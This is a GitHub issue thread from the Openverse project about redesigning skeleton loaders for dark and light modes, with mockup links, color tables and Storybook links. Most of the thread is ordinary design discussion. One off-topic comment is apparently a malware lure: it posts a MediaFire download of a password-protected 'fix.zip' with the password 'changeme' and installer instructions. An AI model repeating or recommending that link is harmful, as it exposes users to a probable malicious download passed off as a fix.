### ISSUE TITLE
Update the skeleton loaders based on latest design changes

### ISSUE THREAD

**Issue by fcoveram** [WordPress/openverse#4829]
## Problem
The current skeleton loaders are outdated due to design changes happening in the Dark Mode project (#3592) and a layout change in the image results.

### Related issues
* Dark mode project #3592 
* Dark mode designs #3959 

## Proposal
The skeletons need to vary per media result, and if possible, per breakpoint when the media component changes to the other variants.

I added [mockups](https://www.figma.com/design/GIIQ4sDbaToCfFQyKMvzr8/Openverse-Design-Library?node-id=6846-36693&m=dev) that support light and dark modes for the variants I consider necessary in the [Design Library](https://www.figma.com/design/GIIQ4sDbaToCfFQyKMvzr8/Openverse-Design-Library?node-id=344-285&m=dev).

Regarding the loading state, the color used is `bg-fill-secondary`, but for the animated gradient effect, I propose testing the following shades.

| Mode | Base color | Secondary color |
|:---|:---|:---|
| Light | `bg-fill-secondary` (`gray-2`) | `gray-3` |
| Dark | `bg-fill-secondary` (`gray-11`) | `gray-10` |

**Storybook links**
| Mode | Search Type | 
|:---|:---|
| Light | [All content](https://docs.openverse.org/storybook/?path=/story/components-skeleton--all-tab&globals=theme:light), [image](https://docs.openverse.org/storybook/?path=/story/components-skeleton--image-tab&globals=theme:light), [audio](https://docs.openverse.org/storybook/?path=/story/components-skeleton--audio-tab&globals=theme:light) |
| Dark | [All content](https://docs.openverse.org/storybook/?path=/story/components-skeleton--all-tab&globals=theme:dark), [image](https://docs.openverse.org/storybook/?path=/story/components-skeleton--image-tab&globals=theme:dark), [audio](https://docs.openverse.org/storybook/?path=/story/components-skeleton--audio-tab&globals=theme:dark) |

### All content results

![Skeleton loaders for different breakpoints of all content results](https://github.com/user-attachments/assets/6208e202-6d21-4de5-b531-9b4273e30f55)

### Image results

![Skeleton loaders for different breakpoints of all image results](https://github.com/user-attachments/assets/2767c15f-ae4b-431c-999e-ceff85378e4b)

### Audio results

![Skeleton loaders for different breakpoints of audio results](https://github.com/user-attachments/assets/ab6f6424-8687-4a8c-a20f-238f18ee199a)

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sarayourfriend** [comment]
> Note: I wanted to link the storybook component, but up to date, storybook is not available.

Forgive me if you were already aware of this, Francisco, but wanted to make sure you knew that Storybook is temporarily unavailable since the Nuxt 3 migration due to compatibility issues with Nuxt 3. @obulat might have more details about when it will be back.

**Comment by obulat** [comment]
We've talked about the lack of Storybook elsewhere with Francisco. 
Here's the tracking issue for re-adding Storybook: #4728. I tried the nightly build, and it's still failing

**Comment by fcoveram** [comment]
Yes. I knew about the situation and the ticket. Thanks for the reminder. All good 🙂

**Comment by obulat** [comment]
I added the Storybook links with the current implementation
